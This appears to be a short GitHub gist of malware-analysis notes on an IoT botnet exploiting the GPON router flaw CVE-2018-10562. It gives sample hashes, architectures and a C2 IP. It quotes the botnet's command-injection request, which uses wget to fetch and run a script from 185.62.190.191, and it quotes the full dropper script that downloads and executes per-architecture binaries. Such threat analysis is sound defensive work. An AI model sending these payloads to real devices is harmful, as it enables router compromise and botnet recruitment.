Skip to content

Instantly share code, notes, and snippets.

@Evilcry

Evilcry/notes.md

Last active May 12, 2018 15:29
Show Gist options
  • Save Evilcry/3bfdcfe589e2933a7c8ab957b7c7c451 to your computer and use it in GitHub Desktop.
Save Evilcry/3bfdcfe589e2933a7c8ab957b7c7c451 to your computer and use it in GitHub Desktop.
Download ZIP
IoT botnet exploiting GPON Remote Code Execution (CVE-2018-10562) some notes
Raw
notes.md

Hash List

:~/collected$ sha256sum *
efa4fe06e4949c0f7aedea61a79da92e379ea66b169cd1d99c47b9e93e814093  arm
1ff787d52bc9ec27d75b1a427c3e5dd16d6d5f082a79227c14edf8e908ab2  arm7
bab7e9f42df88902acb00fbdf3b4b5d8ffec2a1a7ad32eb5f2fb1dbf38f3167d  mips
a79964ce5cf4b92f996bbc24230e102b94ef05fb072c0afdeabc88d28695cace  mipsel

Arch List

:~/collected$ file *
arm:    ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm7:   ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
mips:   ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

IP list

:~/collected$ strings * | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
185.62.190.191
185.62.190.191
185.62.190.191
185.62.190.191

Interesting strings

Probe for vulnerability:

/GponForm/diag_Form?images/

Execute code (check https://www.exploit-db.com/exploits/44576/ for more information):

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0

The resource downloaded is r, a bash script

#!/bin/sh

n="arm mips mipsel arm7"
http_server="185.62.190.191"
#dirs="/tmp /var /dev/shm /dev"
dirs="/tmp"

for dir in $dirs
do
    >$dir/c && cd $dir
done

for i in $n
do
    cp $SHELL $i
    >$i
    wget http://$http_server/$i -O -> $i
    chmod 777 $i
    ./$i
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment